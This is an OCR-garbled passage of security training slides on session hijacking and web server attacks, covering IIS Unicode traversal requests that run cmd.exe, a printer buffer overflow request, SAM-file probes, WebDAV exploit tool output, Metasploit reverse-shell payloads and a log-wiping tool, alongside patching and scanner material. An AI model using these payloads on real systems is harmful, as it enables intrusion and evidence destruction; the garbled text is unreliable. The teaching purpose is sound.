End Tm 



Src Hostname 



Src IP Addr 



S Port 



12/15/02 00:45:40 --/-/-- 

12/15/02 00:46:40 12/15/02 

12/15/02 00:47:23 12/15/02 

12/15/02 00:48:43 12/15/02 

♦* 12/15/02 00:49:18 --/-/-- 

12/15/02 00:49:44 --/-/-- 



00:47:18 
00:47:26 
00:43:46 



192,168.200,92 
192,168.200,94 
192,168.200,94 
192,168.200,94 
192,168.200,96 
192,168.100,12 



192,168.200,92 
192,168.200,94 
192,168.200,94 
192,168.200,94 
192,168.200,96 
192,168.100,12 



192.168.200.92 [1G56] -> 192.168.200.90 123 



Source: 1 92.1 G8.200.92 [1 92.1 G8.200.92] (1 05G) 
Destination: 1 92.1 G8.200.98 [1 92.1 G8.200.98] (23) 
Time: 1 2/1 5/02 00:45:40 -> NOW 



00:45:40: BEGINNING OF LOG 



NOW: END OF LOG 



1 



Packet Stats: 0.067c dropp 1 



Interest Threshold: 1 



Selected Time: 1 2/1 5/02 00:45:40 



1056 
1744 
1755 
1767 
1050 
1052 



Dst Ho: 



192,16 
stqc-15 
stqc-i; 
stqc-15 
192,16 
stqc-12 



10 



I Realtime Plaiiback ^] Generate 
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Remote TCP Session Reset Utility 



Remote TCP Session Reset 



File Edit Session Help 



Ijnjxj 



y # 

Export Print 


0 

Refresh 


Break 


1" 

Help 


ifSs ^ouwinD^.nE: 

Network MonaBemenl Tools 


M 


Router, Switch or Server Name / IP ilWWaHWffll 
Read-Write Communitv String private 


d 
d 




+ 

Connect 


Connection State 


Server IP Address 


Server Port 


Client IP Address 


Client Port 


Established 


216.60.197.254 


23 




208.191 .22.50 


3529 




Established 


216.60.197.254 


23 




208.191 .22.50 


3530 















1 TCP Session Table download complete. ^ 
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Scenario (Cont...) 



N ick captures the authentication tol<ens of his boss's 
sessi on with the supply vendors and gets access to a! I vital 
information to take over his account. 

©What next? 

H e can i nnpersonate his boss 
PI ace orders 

Cause loss of goodwill with the vendors 

Circulate nnalicious stuff fronn his boss' account 

Change the account password and cause closure of the 
account, leading to loss of innportant documents 
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Dangers Posed by H ijacking 



1 M ost computers are vul nerabi e 

2. Little can be done to protect against it 

3. Hijacl<ing is simple to launch 

4. M ost counter measures do not work 

5. H i j acki ng i s very dangerous (theft of i denti ty, fraud, 
etc.) 
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Protecti ng Agai nst Sessi on H i j acki ng 



1 Use encryption 

2. U se a secu re protocol 



3. Limit incoming connections 

4. |V| i n i mi ze remote access 

5. Educate the employees 
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Counter measure: I P Security 



© 1 1 is a set of protocols developed by the I ETF to 
support secure exchange of packets at the LP 
layer. 

© Deployed widely to implement Virtual Private 
Networks (VPNs) . 

© I Psec supports two encryption modes: 

• Transport 

• Tunnel 

• The sending and receiving devices must share a 
public key . 
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IP-SEC 



I 



© http:// h30097.www3.hp.com/ unix/ i psec/ 



ConfiguratiDn des tunnels IPsec VPN 



Nonn du fichier : |ALL 



B<D Gwind 

Authentification (Phase 1 ) 

' P Proposition 1 

□■■^^ Echange de clefs (Phase 2 

'■ P Proposition 1 

El-O PIX 

S Authentification (Phase 1 ) 
I Proposition 1 

^ I Proposition 2 

Echange de clefs (Phase 2, 

'■ P Proposition 1 

B-O VPN3000 

S Authentification (Phase 1 ) 
I Proposition 1 

^ I Proposition 2 

S Echange de clefs (Phase 2 

'■ P Proposition 1 

B-O OpenBSD 

S Authentification (Phase 1 ) 

'■ P Proposition 1 

B"€^ Echange de clefs (Phase 2 
'■ P Proposition 1 t | 



■5= Nouveau 



Supprimer I 
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Configuration avancee (PSK et PKI)~ 

I 



Mode d'action : 
|~ En reponse uniquement 



B 



« Configuration generale 



■ Echange des certificats 

p' Envoyer le certificat 

|7 Demander le certificat s'il n'ewiste pas localement 



Envoyer 



^ Annule 
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Summary 



© I n the case of a sessi on hij acki ng, an attacker rel i es on 
the legiti mate user to connect and authenticate and 
then take over the sessi on . 

© I n a spoof i ng attack, the attacker pretends to be another 
user or machi ne to gai n access. 

© Successful session hijacking is extremely difficult and 
only possi ble when a number of factors are under the 
attacker's control. 

© Session hijacking can be active or passive in nature 
depend i ng on the degree of i nvol vement of the attacker 
i n the attack. 

© A vari ety of tool s exi st to ai d the attacker i n 
perpetrating a session hijack. 

© Sess on hijacking could be very dangerous and there is a 
need for implementing strict counter measures. 
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Ethical Hacking 



ModuleXI 

H acki ng Web Servers 



Scenario 



J ason istheSystems Engineer in a IT firm. 
Recently, J ason lost all his savings in an 
i nvestnnent proposal when the share prices of 
his portfolio plunnnneted. NowJ ason is in huge 
debt. 

H e has been tennpted with a huge annount of 
nnoney by a rival fi rnn to steal sonne secret 
docunnents fronn his connpany. H e refuses 
initially, but repeated calls fronn the rivals 
nnake hi nn change his nnind. 

1 What can J ason do to successfully carry out the act? 

2. Will J ason firstattennpt to hide his presence on the 
systenn, and then rennain there quietly for sometinne, 
observi ng f i I e transfers? 

3. Will he look for specific unpatched software so that 
he can exploit some vu In erabi I i ties? 
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Module Objective 



©I ntroduction to Web Servers 

©Popular Web Servers and Common Vulnerabilities 

©Apache Web Server Security 

©I IS Server Security 

©Attacks Agai nst Web Servers 

©Tools used i n Attack 

© Cou nter measu res 

©I ncreasing Web Server Security 

Copyri ght © by BC-Cbunc i I 

Bo-COUnci I All Rights reserved. Reproduction isstrictly prohibited 



I ntroduction to Web Servers 



Vul nerabi I i ti es i n Apache 



I I IS Vulnerabilities 



1 1 S Components 



^ Hacking 1 001 sto^^^^ 

ExDioit Vul nerabi 1 i ti es 




Vulnerability Scanners 













^^^^ountemn^^ 
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H ow Web Servers Work 



The browser connects to the server and requests a page 



Z 



The server sends back the requested page 



Machine running 
web browser 



Server 
machine 
running a web 
server 
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H ow Web Servers Work 



I 



1 The browser breaks the URL 
into three parts: 

1 The protocol ("http") 

2. The server name 
("www.website.com") 

3. The filename 
("webpagahtml") 

2. The browser communicates 
with a name server, which 
translates the server name, 
www. websi te. com , i nto an 

I P address 

3. The browser then forms a 
TCP connection to the web 
server at that I P address on 
port 80 

BC-Gouncil 



Following the HTTP 
protocol, the browser 
sends a GET request to 
the server, aski ng for the 
file http://webpage.html 

The server sends the 
HTML text for the web 
page to the browser. 

The browser reads the 
HTM L tags and formats 
the page onto the screen 
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H ow are Web Servers Compromised? 



© Misconfigu rations: I n operating 
systems or networl<s 

© Bugs: OS bugs may allow 
commands to be run on tine web 

© I nstal I i ng tine server with 
defaults: Service packs may not 
be applied in the process, leaving 
holes behind 

© Lack of proper security policy, 
procedures, and maintenance 
may create many loopholes for 
attackers to exploit 
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Popular Web Servers and Common Security 
Threats 



© Apache Web Server 

©IIS Web Server 

© Sun ONE Web Server 

© Nature of Security Threats in a 
Web Server Environment: 

Bugs or Web Server 
Misconfiguration 

Browser- Side or Client- Side Risl<s 

>^ Sniffing 

>^ Denial of Servi ce Attack 
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Apache Vu nerability 



I 



© The Apache Week tracks the vul nerabi I ities i n Apache 
Server. Even Apache has its share of bugs and fixes. 

©For instance, consider the vul nerability which was found in 
the Win32 port of Apache 13.20. 

• Long URLs passing through the nnod_ negative, mod_dir 
and nnode_autoindex modules could cause Apache to list 
directory contents. 

• The concept is simple but requires a few trial runs. 

• A URL with a large number of trailing slashes: 

- /cgi-bin /////////////// 1 1 1 1 1 1 1 1 1 1 1 1 1 could produce 
di rectory I i sti ng of the ori gi nal di rectory. 
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Attacks Against IIS 



© 1 1 S is one of the most widely used 
web server platforms on the 
I nternet. 

© M i crosoft's web server has been a 
frequent target over the years. 

© 1 1 has been attacked by vari ous 
vulnerabilities. Examples include: 

• : : $ DATA vu I nerabi I i ty 

• showcodaasp vu! nerabi I ity 

• P i ggy bacl<i n g vu I n er abi I i ty 

• Privilegeconnnnand execution 

• Buffer Overflow exploits (I I Shack.exe) 
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1 1 S Components 



© 1 1 S rel i es heavi I y on a col I ecti on 
of DLLs that work together with 
the mai n server process, 
inetinfo.exe, to provide various 
capabilities. Example: server side 
scripting, content indexing, web- 
based printing, etc. 

©This architecture provides 
attackers with different 
f u ncti onal i ty to expl oi t vi a 
malicious input. 



S SERVER 



ASP.DLL 




ISAPI.DLL 



PRL.DLL \ ASPNET.DLL 
Msw3prt.dll 
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Sample Buffer Overflow 
Vulnerabilities 



© One of the most extreme security vul nerabi I iti es 
associated witli I SAPI DLLs is tlie buffer overflow. 

© Tliere is a buffer overflow i n II S withi n the I SAPI fi Iter 
that handles pri nter fi les that provide support for the 
I nternet Printing Protocol (I PP). 

The vul nerabi I ity arises when a buffer of approxi mately 
420 bytes is sent to the HTTP host. Ex: GET 
/NULL. printer HTTP/LO HOST: [buffer] 
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1 1 S Directory Traversal 



I 



©The vul nerabi I ity results because of a 
canon icalizat ion error affecting CGI scripts and 
I SAP I extensions (.ASP is probably the best 
known I SAP I -mapped file type). 

©Canon i cal i zati on i s the process by whi ch 
various equivalent forms of a name can be 
resolved to a single, standard name. 

©For example, "%cO%af" and "%cr/o9c" are 
overlong representations for ?/? and ?\?. 

©Thus, byfeeding the HTTP request I ike the 
fol lowi nq to 1 1 S, arbitrary commands can be 
executed on the server: 

GET/ scr i pts/ . .%cO%af . ./win nt/ system32/ cmd . 
exe?/c4dir=c:\ HTTP/ 10 
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Proof of concept 
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© ASCII charactersfor the dots are replaced with the Unicode 
equivalent (%2E). 

© ASCII charactersfor the si ashes are replaced with Unicode 
equivalent (%cO%af). 

© Unicode2.0 allows multiple encoding possibilities for each 
characters. 

© Unicode for "/": 2f, cOaf, eOSOaf, f08080af, f8808080af, 



© Over long Unicode is NOT malformed, but not allowed by a 
correct Unicode encoder and decoder. 

© M al iciously used to bypass fi Iters that only check short 
Unicode. 

N ote: U n i code i s d i scussed here as proof of concept 
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Unicode Directory Traversal Vulnerability 



© Occurs due to a canonical izati on error in jviicrosoft 
II S 4.0 and 5.0 

© A malformed URL could be used to access fi les and 
folders that lie anywhere on the logical drive that 
contai ns the web folders 

© Th 1 s al I ows the attacker to escal ate h i s pr i vi I eges on 
the machine 

© This would enablethe malicious user to add, 
change or delete data, run code al ready on the 
server, or upload new code to the server and run it 

© This vulnerability can be exploited by using the 
NETCAT as the backdoor (Trojan horse) 
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Proof of concept ^ 
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Hacking Tool: IISxploit.exe 



f IIS Xploit vI.O by GrEeK_pIrAtE 



File IIS Related Links Help 



iFile to Dowriload(e.g. 
IC:\Test\TeHt.tHt): 




Upload File 




Address: 




File to run[e.g. 
C:\Test\teKt.tKt: 



pile to rename Whole address 
e.g. C:\Test\teyt.tyt: 




This tool automates the directory traversal exploit in IIS 
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Proof of concept 
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M sw3prt I PP Vul nerabi I ity 



© The I SAP I extension responsible for I PP is 
msw3prt.dll. 

© An oversized print request containing a valid 
program code can be used to perform a new 
function or load a different separate program and 
cause buffer overflow. 
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WebDAV/ ntdll.dll Vulnerability 



©WebDAV stands for "Web- based 
Distributed Authoring and Versioning." 

©The 1 1 S WebDAV connponent uti I izes 
ntdll.dll when processing inconning 
WebDAV requests. Bysending a specially 
crafted WebDAV request to an II S 5.0 
server, an attacker nnay be able to execute 
arbitrary code i n the Local Systenn 
security context, essenti al ly gi vi ng the 
attacker connplete control of the systenn. 

©This vul nerabi I ity enables attackers to 
cause: 

• Denial-of-service against Win2K 
nnachines. 

• E xecuti on of nnal i ci ous codes. 






NtCreateFile 


* 








NtReadFile 


> 








* 








NtClose 





Systenn Service Table 



Source: http://www.sysinternals.corn/image5/screenshots/ ntdll.gif 




Proof of concept 
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Real World I nstance of WebDAV Exploit 



I 
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Knowledge Centers 

Security 
Storage 

Mobile a Wireless 
Hardware 

Business Intelligence 

Networking 

Software 



Jump to any 
Knowledge Center 

r= — 3 

Partner Zones 

Application Integration 
Business Intelligence 
Data Management 
PC Lifecycle 
Web Services 



Features 



Latest Headlines 
This Week's Issue 
Shark Tank 




Home > Browse Topics > Security > Hacking 



U.S. Army Web servers hacked 

News Stor/ by Dan Verton 

MARCH 18. 2DD3 fCOMPUTERWORLDl - WASHINGTON - Hackers 
on March 11 infiltrated an undisclosed number of U.S. Army Web 
sen/ers, taking advanta ge of a previously un disclosed buffer- overflow 
vulnei^Jjilit*HT^ffnmponentof Microsoft Cor^^WTshsw^DOO that is 
to manage the Web Distributed Authoring And Versioning 
/ebDAV) protocol. 



Security expert^T^tWwrtefww^^+fCTWffllfflfflsa^ example of a 
"0-day" exploit, referring to an exploit that takes advantage of a 
vulnerability nobody is aware of and for which there is no available patch. 
(see story) . Security vendors are also advising users that there are work- 
vulnerability. 



S Print-friendly eH E-mail this H Feedback BRepi 

Related to this topic 

> Update: Army denies hacking Incident 

> Microsoft confident bounties will nab virus writers 

> Hackers take advantage of Microsoft ASN flaw 

> Dual curses: Viruses and spam 

> Help! I've been Web-jacked! 

> Sidebar: Security and QoS Lexicon 

> Security and QoS Unite 

> Avoid worms with these seven steps 

However, Microsoft issued a fix yesterday for the vulnerab 
arounds that can be implemented immediately to reduce 



WebDAV, which is installed by default with Internet Information Server (IIS) Version 5.0, allows documents to be assigned propertie 
and attributes and enables collaborative creation, editing and searching from remote locations. It also enables documents to be writ 
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Hacking Tool: "KaHT" 



©The tool scans for WebDAV 
vul nerabi e machi nes, 
compromises the system with a 
custom script and then installs a 
tool kit on the victim machine 

©The tool kit is reported to add the 
user "KaHT" to the Administrator 
group 
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[Crpt] ntdlLdll/WebDAV eKploit vO.2 by kralor [Crpt] B 


target 


padding 






192.1G8.1.1 


10 ■> 


254 


Exploit 


Stop 


Satan's ip flHHi satan's port custom pads 


on/off 


192.1G8.1.2 


66G 


208.20a205,20G,12,215 0 


status 


building buffer ...DONE 
Checking WebDav ...FOUND 
Trying with custom pads ... OK 
Connecting to 1 92.1 GS.1.T ..CONNECTED 
trying ret addr OxOOdOOOdO ..PATCHED? 
DONE 




A 1 


\ coded by kralor, visit crpt team at http://www.coromputer.net j| 




Proof of concept 
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RPC DCOM Vulnerability 



© 1 1 exists i n Wi ndows Component Object M odd 
(COM ) subsystem, which is a critical service used 
by many Windows applications 

© DCOM service allows COM objects to communicate 
with one another across a network and is activated 
by default on Windows NT, 2000, XP, and 2003 

© Attackers can reach for the vulnerability in COM via 
any of the fol lowi ng ports: 

• TCP and UDP ports B5 (Remote Procedure Call) 

• TCP ports B9 and 445 (NetBI OS) 

• TCP port 593 (RPC-over-HTTP) 

• Any 1 1 S HTTP/ HTTPS port if COM I nternet Services are 
enabled 
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© ASN, or Abstract Syntax Notation, is used for 
represent! ng different types of bi nary data such as 
numbers or stri ngs of text. 

© The ASN. 1 exploit targets a Windows authentication 
protocol known as NT LAN M anager V2, or 
NTLMV2. 

© The attacker can run a program that will cause 
machi nes usi ng a vul nerabi e versi on of the ASN . 1 
Library to reboot, producing a so-called denial-of- 
service attack. 
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1 1 S Logs 



© IIS logs all the visits in log files. The log file is 
I ocated at: <%systemroot%>\ I ogf i I es 

© I f proxies are not used, then I P can be logged 

© This command lists the log files: 

http:/ / vi cti m.com/ scri pts/ . .%cO%af . ./ . .%cO%af . ./ . . 
%cO%af . ./ . .%cO%af . ./ . .%cO%af . ./ . .%cO%af . ./ . .%cO 
%af . ./ . . %cO%af . ./ wi n nt/ system32/ cmd . exe?/ c+d i r 
-K::\ Wi nnt\ system32\ Logf i les\ W3SVC1 
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Network Tool: Log Analyzer 



This tool helps to grab web server logs and build graphically 
rich self-explanatory reports on website usage statistics, 
referring sites, traffic flow, search phrases, etc. 



|4^MvLDgsList AlterWind LogAnalvzer 








□ Ixl 


File View Help 


II D ^ [21 ' + X O 


S El 


f ^ 




Log FileName 


File Date 


Start log date 


End log date 


Lines 



D : Mogs\access2002061 7. log 30/0G/2002 1 8: 03: 24 1 6/06/2002 23: 56: 08 1 7/06/2002 23: 45: 21 39730 
D: Mogs\access20020618.log 30/06/2002 18:03:30 18/06/2002 00:02:14 18/06/2002 23:50:59 34857 



D:Mogs\access2002061 9.lor 



D: Mogs\access20020620.log 30/06/2002 18:03:40 19/06/2002 23:55:58 20/06/2002 23:54:03 52978 

D : Mogs\access20020621 .log 30/06/2002 1 8: 03: 44 21 /06/2002 00: 05: 46 21 /06/2002 23: 55: 00 3951 3 

D : Mogs\access20020622. log 30/06/2002 1 8: 03: 50 21 /06/2002 23: 56: 03 22/06/2002 23: 43: 58 3041 6 

D : Mogs\access20020623. log 30/06/2002 1 8: 03: 54 23/06/2002 00: 05: 1 7 23/06/2002 23: 46: 23 19218 
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For Help, press F1 
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Hacking Tool: CleanllSLog 



I 



© This tool clearsthelogentriesinthel IS log files filtered by 
an I P address. 

© An attacker can easi ly cover his trace by removi ng entries 
^ based on his I P address in W3SVC Log Files. 



C Untitled - Notepad 



File Edit Format View Help 




p=GET arg=http : //Target 
/. .255c. ./winnt/system32/cmd .eKe?/c+dir+c :\\* .cif/s/b 



Jun 10 12:53:37.84 
IP/msadc/. .%255c . ./ 
result="500 Server Error" 

Jun 10 12:53:39.575 4.5.6.7 op=GET arg=http : //Target 

IP/a .asp/. .%cl%lc ../. .^cl%lc . ./winnt/repair/sam result="404 Object Mot Found' 
Jun 10 12:53:43.578 4 . 5 . 6 . 7| op=GET arg=http : //Target 

IP/a .asp/. .%cl%9c ../. .^cl%5c . ./winnt/repair/sam result="404 Object Mot Found' 
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Unspecified Executable Patli 
Vulnerability 



© When executables and DLL files are not preceded by a path 
in the registry (e.g. explorer.exe does not have a fixed path 
by default). 

© Windows NT 4.0/ 2000 will search for the file in the 
following locations in this order: 

• thedirectoryfrom which the application loaded 

• the current di rectory of the parent process 

• . . .\ systenn32 

• ...\ system 

• the windows directory 

• the directories specified in the PATH environment 
variable 
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Metasploit Framework 



© Metasploit framework is an advanced open-source 
platform for developing, testing, and using exploit 
code 

© A tool for penetration testing, exploit development, 
and vul nerabi I ity research 

© The framework was composed i n Perl scri pti ng 
language and consists of several components 
written in C, assembler, and Python 

© Runs on any UN IX- like system under its default 
configuration 

© A customized Cygwi n envi ronment for Wi ndows OS 
users 
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Metasploit- Screenshot 



Starti ng the console 



Si) Shell - Konsole 

Session Edit View Bookmarks Settings Help 



Tiny Win32 reverse 



Shell - Konsole 



Session Edit View Bookmarks Settings Help 



Metasploit Fr 



pk Usable Faylo 



_dll in ject 
_meterpreter 

_Btg 

_stg_Ljpexec 
_vncin ject 

rse 

rse_dllinject 

rse_meterpreter 

rse_ord 

rse_ord_vncin ject 
rse_stg 

rse_stg_upexec 
rse_vncinject 



Windows Execute net user /ADD 

Windows Bind Shell 

Windows Bind DLL Inject 

Windows Bind Meterpreter DLL Inject 

Windows Staged Bind Shell 

Windows Staged Bind Upload/Execute 

Windows Bind VNC Server DLL Inject 

Windows Execute Comrnand 

Windows Reverse Shell 

Windows Reverse DLL Inject 

Windows Reverse Meterpreter DLL Inject 

Windows Staged Reverse Ordinal Shell 

Windows Reverse Ordinal VNC Server DLL Inject 

Windows Staged Reverse Shell 

Windows Staged Reverse Upload/Execute 

Windows Reverse VHC Server DLL Inject 



Name: LJindaws Staged Reverse Or 

Version: SRevision : 1.5 $ 

□S/CPU: ujin3Z/x86 

Needs Admin: No 

Multistage: Yes 

Total Size: 94 

Keys: reverse +ujs2ord 

Provided By : 

spoonm <ninjatDols [at] hush. corn) 
skape <mmiller [at] hick.org> 
vladg02 <vladg02 [at] gmail.com> 

Available Options: 

□pticns: Name Default 

required EXITFUNC seh 

required LHDST 

required LPDRT 4321 



Ordinal Shell 



Exit technique: "process", "thread", "seh" 
Local address to receive connection 
Local port to receive connection 



Advanced Options: 

Advanced (Msf : :Payload: :win32_reverse_ord) : 



ct back to attacke 



M Shew 



ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. oS oSP 

8' 8 8 8oDOo8 8 .□□□o8 Yb.. 8 888 88 8 

8888. 88 8 'Yb.8 888 88 8 

8 8 8 ~Yooo' 8 ~YooP8 'YooP' 8YooP' 8 ~YooP' 8 8 



+ — — =[ msfconsole v2.3 [46 exploits - 59 payloads] 
msf > help 

Metasploit Framework Main Console Help 



7 


Show the main console help 


cd 


Change working directory 


exit 


Exit the console 


help 


Show the main console help 


in-Fo 


Display detailed exploit or payload information 


quit 


Exit the console 


reload 


Reload exploits and payloads 


save 


Save configuration to disk 


setg 


Set a global environment variable 


show 


Show available exploits and payloads 


unsetg 


Remove a global environment variable 


use 


Select an exploit by name 


version 


Show console version 



msf > use msrpc_dcom_ms03_026 
msf m5rpc_dcom_msQ3_026 > shoio 
advanced options payloads targets 
msf msrpc deem msQ3 026 > shcio options 

.Exploit Options 



Exploit: Name Default Description 



required RHDST The target address 

required RPDRT 135 The target port 

Target: Windows NT SP6/2K/XP/2K3 ALL 

msf m5rpc_dcom_msQ3_026 > [] 
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Scenario 



The system in J ason's firm was running |V| icrosoft 
Windows 2000 with Internet Information Server 
(IIS) enabled. 

J ason scanned the system and discovered that it 
was susceptible to WebDav protocol vulnerability. 
This vulnerability allowed him to upload and 
download files stored on the web server. J ason 
could also send specially crafted requests to the 
server, which enabled him to execute arbitrary 
commands and alter files. 

• I s i t possi bl e to trace back the evi I acti vi ty? 

• Do you thi nk that II S log fi les can be tannpered with? 

• H ow can such vulnerabi I i ties be prevented? 
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Hotfixesand Patches 



©A hotf ix is code that fixes a bug i n a 
product. The users may be notified through 
emai Is or through the vendor's website. 

©H otfixes are someti mes pacl<aged as a set 
of fixes called a combined hotf ix or service 
pack . 

©A patch can be considered as a repair job 
1 n a pi ece of programmi ng probi em. A 
patch i s the i mmedi ate sol uti on that i s 
provided to users. 
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What is Patch Management? 



© "Patch management is a process used to 
ensure that the appropriate patches are 
installed on a system." 

© It involves the foil owing: 

• Choosing, verifying, testing, and applying 
patches 

• Updating previously applied patches with 
current patches 

• Listing patches applied previously to the 
current software 

• Recording repositories, or depots, of patches 
for easy sel ecti on 

• Assigning and deploying applied patches 
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Solution: UpdateExpert 



© UpdateExpert is a Windows administration program that 
helps you secure your systems by remotely managing service 
packs and hotfixes. 

© M icrosoft constantly releases updates for the OS and mission 
critical applications, which fix security vulnerabilities and 
system stabi I i ty probi ems. 

© UpdateExpert enhances security, keeps systems up-to-date, 
eliminates sneaker- net, i mproves system reliability and QoS 
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Patch Management Tool: qfecheck 



G:SCEH\Haja\patcli>qfecliecJ: /u 

Windows 2000 Hotfix Ualidation Report for \SSVSTEM5 
Report Date: 5/17/2005 2:23pn 

Current Service Pack Level: Service Pack 4 

Hotfixes Identified: 

Q327194: Current on system. 

KB820888: Current on system. 

KB822831: Current on system. 

KB823182: Current on system. 

KB823559: Current on system. 

KB824105: Current on system. 

KB825119: Current on system. 

KB82G232: Current on system. 

KB82803G: Current on system. 

KB828741: Current on system. 

KB828749: Current on system. 

KB835732: Current on system. 

KB837001: Current on system. 

KB839G4G: Current on system. 

KB840315: Current on system. 

KB840987: Current on system. 

KB841356: Current on system. 

KB841533: Current on system. 

KB841872: Current on system. 

KB841873: Current on system. 

KBS42526: Current on system. 

KB842773: Current on system. 

KB871250: Current on system. 

KB873333: Current on system. 

KB873339: Current on system. 

KB885250: Current on system. 

KB885835: Current on system. 

KB885836: Current on system. 

KB888113: Current on system. 

KB890047: Current on system. 

KB890175: Current on system. 

KB890859: Current on system. 

KB891711: Current on system. 

KB891781: Current on system. 

KB8930G6: Current on system. 

KB893086: Current on system. 

KB893803: Current on system. 

Q818043: Current on system. 



© Qfecheck al I ows customers to 
diagnose and eliminate the 
effects of anomal i es i n the 
pacl<agi ng of hotfixes for 
|V| icrosoft Wi ndows 2000. 

© Qfechecl<.exe determines 
which hotfixes are installed 
by readi ng the i nformati on 
stored in the foil owing 
regi stry key: 

• HKEY_LOCAL_MACHINE\SO 
FTWARE\ M i crosoft\ U pdates 
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Patch M anagement Tool : H F N etChk 



I 



©A command- line tool that enables the administrator to check 
the patch status of al I the machi nes i n a network remotely. 

©It does this function by referring to an XML database that is 
constantly updated by M icrosoft. 



fiil C:\WINNT\Sy stem3Z\cmd.eHe 



MICRON 



UINDOUS 2000 SF2 



Patch NOT Found MS 00-077 

Patch NOT Fouind MS 00-079 

Patch NOT Found MS01-007 

Patch NOT Found MS 01 -01 3 



UnRNING 



MS01-022 



Patch NOT Found MS 01 -02 5 
Patch NOT Found MS 01 -03 7 
Patch NOT Found MS01-041 

Internet Information Services 5.0 

Patch NOT Found MS 01 -02 5 

Internet Explorer 5.5 SP2 



INFORMATION 

All necessarv hotfixes have been applied 



Q299796 
Q276471 
Q285851 
Q285156 
Q296441 
Q296185 
Q302755 
Q298012 



Q296185 
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cac s.exe uti ity 



©Built-in Windows 2000 utility (cacls.exe) can set access 
control list(ACLs) permissions globally. 

©To change permissions on all executable files to System: Full, 
Administrators: Full, 

C:\ >cacl s.exe c:\ myfolder\*.exe/T / G System: F 
Administrators: F 



t^ v Command Prompt 



C:SSnort>cacls .exe *.exe /T /G Systen:F fldninistrators :F 

fire you sure <V/N>?y 

processed file: C:\Snort\snort.exe 

C:\Snort> 




BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Vul nerabi I i ty Scanners 



© The different types of vul nerabi I ity scanners 
accord i ng to tiiei r avai I abi I ity are: 

• Onii ne Scanners : e.g. www.securityseers.conri . 

• Open Source scanners: e.g. Snort, Nessus Security 
Scanner, Nmap, etc. 

• Linux Proprietary Scanners: The resource for scanners on 
Linux is SANE (Scanner Access Now Easy). Besides SANE 
there is XVScan, Parallel Port Scanners under Linux, and 
USB Scanners on Linux. 

• Commercial Scanners: these can be bought from the 
vendors. 
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Online Vulnerability Search Engine 



ICAT contains: 
7630 vulnerabili 

Last updated: 
05/02/05 



hable 



ICAT is a searchable 
index of information on 
computer vulnerabilities. 
It provides search _ 
capability at a fine ^ 
granularity and links 
users to vulnerability 
and patch information. 



Enter your e-mail address and 
press "Add" to reoeive ICAT 
announoements. 



The ICAT team 
appreciates the 
contnbutions and 
support of the following 
organizations: CERIAS, 
FedCIRC, ISS X- 
Force, NIAP, SANS 
Institute, and Security 
Focus. 



our CVE Vulnerability Search Engine 
ARCH DOWNLOAD NOTIFICATION CONTACT 



TISTICS 
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ich tips: 

All drop down menus are ANDed together to create a query. 

Click a link below to look up vulnerabilities by vendor or product name 

represents non -alphabetic characters 
Double -quotes are ignored in text-search; Individual words are ANDed together. 



Search-> 



All entries | 


1 Year | 


6 Months 1 


3 Months 1 


Reset values | 



Vendor 
Product 
Version 

Keyword search 

(try a CVE or CAN name;) 

Severity 



.A..B C..E F..H I..K L.N 0..Q R..T U..W X..Z All 
.A..B C..E F..H I..K L.N 0..Q R..T U..W X..Z All 

— Choose a Vendor or Product — 



3 



Any. 



Any. 



General Filters: 
Common Sources 
Related exploit range 
Vulnerability consequence Any 
Vulnerability type Any 
Exposed component type Any 
Entry type 

Entries since the following 
date 



Any. 



3 



[Any Month '^j [Any Year '^j 



The ICAT Metabase is a product of the Computer Security Division at the National Institute of Standards and 

Technology. 

ICAT Creator: Peter Mell 
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Network Too : Whisker 



© Whisker is an automated vulnerability scanning software 
that scans for the presence of exploitable files on remote 
web servers. 

© Refer to the output of this simple scan below and you will 

see that Whisker has identified several potentially 
^ dangerous fi les on this II SSServer. 



c; \>>fhistei:* pi -h victim, com -s scairi. db 



= Host: victim* com 

— Servei:; Micirosof t-H3/5 . 0 

+ 2O0 OK: GET /whisker, id a 

+ 2O0 OK; GET /wlaisker. idg 

+ 2O0 OK: HEAD / vti inf . html 

+ 2O0 OK: HEAD / vti bin/ shtml.dll 

+ 2O0 OK: HEAD / vti bin/ shtml.exe 
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Network Tool: N- 
Scanner 



©N -Stealth 5 is an impressive web 
vul nerabi I ity scanner that scans 
over ISOOO HTTP security issues. 

©Stealth HTTP Scanner writes 
scan results to an easy HTM L 
report. 

©N-Stealth is often used by 
security companies for penetration 
testing and system auditing, 
specif i cal ly for testi ng web servers. 
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©Webl nspect is an impressive web 
server and application- level 
vul nerabi I i ty scanner that scans over 
1500 known attacks. 

©It checks site contents and analyzes 
for rudimentary application- issues 
I i ke smart guesswork checks, 
password guessi ng, parameter 
passing, and hidden parameter 
checks. 

©It can analyze a basic web server i n 
4 minutes, cataloging over 1500 
HTML pages. 
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Qle Edit View Toots Help 



Weblnspect [Quitk 5can.apc] 



C New |g Save ^ Open | II ^ I Audi1 ^Ptky Q Report /Smatt Update 



Gl- 0Q Jiivale 

H EC] _viLlog 

B E_l aiiriiin 

Qk^ admin.html 
E<S help.cgi 

1 ; □ .Jj Sciipling pe 
: usei.phpS 

1 Si E " ^S.FTP.Lt 

B- EQ backup 

H EQ cgi'bin 

B E— 1 M*iel«t 

B E— 1 eustapps 

B E& 




Report I SesslonAudIt j Propeities | 






1 




3VS leaves sensitive information in this directory. This irformation could b 
be system and give an attacker knowledge which could later be used in £b 


Fix: 


Remove the reposioiy from the public server. 








SiteViev) 1 SequenceView | 






Severity Count Tjipe 


Summarji UPL 


^ Dilical 2 Vulnerability Database Server Enor Message ...lisl„. 
^ Dilicsl 1 Vulneability IIS S.0 liiternet Printing Protocol ISAPI Buffer Overflow htlp:/^ndo.websppsecuritii.oom 
^ Dtlical 1 Vulneiebility IIS Global Server Variables Disclosure yobal.asa.bak] hllp://endo.Meb3ppsecuritji.com 
^ Critical 1 Vulneiabiity Sackup Fits (cgi.zip| httpi/Zendo. webappsecuriljj.com 
^ Critical 1 Vulnejabiity CVS Content Files htlp://Bndo.web3ppsBcuritii.com 


Aleit$ { System Log 


Scan opened i ' 



Picture Source: 

http://www.progress.co. nz/ eM ai lers/ i mages/ sdm0307d_ f2.j pg 
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Network Tool : Shadow Security 
Scanner 



© Security scanner is designed to identify l<nown and unl<nown 
vulnerabilities, suggest fixes to identified vulnerabilities, and 
report possi ble security holes withi n a network's i nternet, 
intranet, and extranet environments. 

© Shadow Security Scanner includes vulnerability auditing 
modules for many systems and services. 

© These include NetBIOS, HTTP, CGI and WinCGI, FTP, DNS, 
